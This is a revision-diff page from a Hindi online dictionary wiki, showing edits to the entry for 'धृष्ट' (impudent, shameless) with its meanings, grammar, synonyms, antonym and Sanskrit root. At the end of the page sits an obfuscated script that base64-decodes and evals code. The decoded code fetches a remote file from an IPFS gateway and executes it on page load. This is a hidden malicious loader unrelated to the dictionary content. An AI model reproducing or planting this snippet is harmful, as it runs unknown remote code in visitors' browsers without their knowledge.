Difference between revisions of "धृष्ट"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{शब्द संदर्भ लघु |हिन्दी=ढीठ, अशिष्ट, निर्लज्ज, बड़ों ...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "करनेवाला" to "करने वाला")
 
(3 intermediate revisions by one other user not shown)
Line 1: Line 1:
 
{{शब्द संदर्भ लघु
 
{{शब्द संदर्भ लघु
|हिन्दी=ढीठ, अशिष्ट, निर्लज्ज, बड़ों के समक्ष लज्जा या संकोच त्यागकर ओछा या बेहूदा काम करनेवाला, ऐसा काम करनेवाला जिससे बड़ों के सम्मान को कुछ धक्का लगता हो, जो अनुचित काम करने से भयभीत या संकुचित न होता हो दुस्साहसी, साहित्य में, वह नायक जो बार-बार वही काम करता हो। जिससे प्रेमिका खिन्न होती हो और मना किये जाने पर भी न मानता हो, चेदिवंशीय [[कुंति]] का पुत्र। (हरिवंश), सातवें मनु का एक पुत, अस्त्रों का एक प्रकार का प्रतिकार या संहार।
+
|हिन्दी=ढीठ, अशिष्ट, निर्लज्ज, बड़ों के समक्ष लज्जा या संकोच त्यागकर ओछा या बेहूदा काम करने वाला, ऐसा काम करने वाला जिससे बड़ों के सम्मान को कुछ धक्का लगता हो, जो अनुचित काम करने से भयभीत या संकुचित न होता हो दुस्साहसी, साहित्य में, वह नायक जो बार-बार वही काम करता हो। जिससे प्रेमिका खिन्न होती हो और मना किये जाने पर भी न मानता हो, चेदिवंशीय कुंति का पुत्र। (हरिवंश), सातवें मनु का एक पुत्र, अस्त्रों का एक प्रकार का प्रतिकार या संहार।
 
|व्याकरण=[[विशेषण]], पुल्लिंग
 
|व्याकरण=[[विशेषण]], पुल्लिंग
 
|उदाहरण=
 
|उदाहरण=
Line 7: Line 7:
 
|पर्यायवाची=अक्खड, अनम्र, अविनम्र, अशील, हूश, गुस्ताख़, उद्धत।
 
|पर्यायवाची=अक्खड, अनम्र, अविनम्र, अशील, हूश, गुस्ताख़, उद्धत।
 
|संस्कृत=धृष्+क्त
 
|संस्कृत=धृष्+क्त
|अन्य ग्रंथ=[[धृष्टता]]
+
|अन्य ग्रंथ=
|संबंधित शब्द=
+
|संबंधित शब्द=[[धृष्टता]]
 
}}
 
}}
 
__INDEX__
 
__INDEX__

Latest revision as of 13:52, 6 September 2017

shabd sandarbh
hindi dhith, ashisht, nirlajj, b doan ke samaksh lajja ya sankoch tyagakar ochha ya behooda kam karane vala, aisa kam karane vala jisase b doan ke samman ko kuchh dhakka lagata ho, jo anuchit kam karane se bhayabhit ya sankuchit n hota ho dussahasi, sahity mean, vah nayak jo bar-bar vahi kam karata ho. jisase premika khinn hoti ho aur mana kiye jane par bhi n manata ho, chedivanshiy kuanti ka putr. (harivansh), satavean manu ka ek putr, astroan ka ek prakar ka pratikar ya sanhar.
-vyakaran    visheshan, pulliang
-udaharan  
-vishesh   
-vilom    vinit
-paryayavachi    akkhad, anamr, avinamr, ashil, hoosh, gustakh, uddhat.
sanskrit dhrishh+kt
any granth
sanbandhit shabd dhrishtata
sanbandhit lekh

any shabdoan ke arth ke lie dekhean shabd sandarbh kosh
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>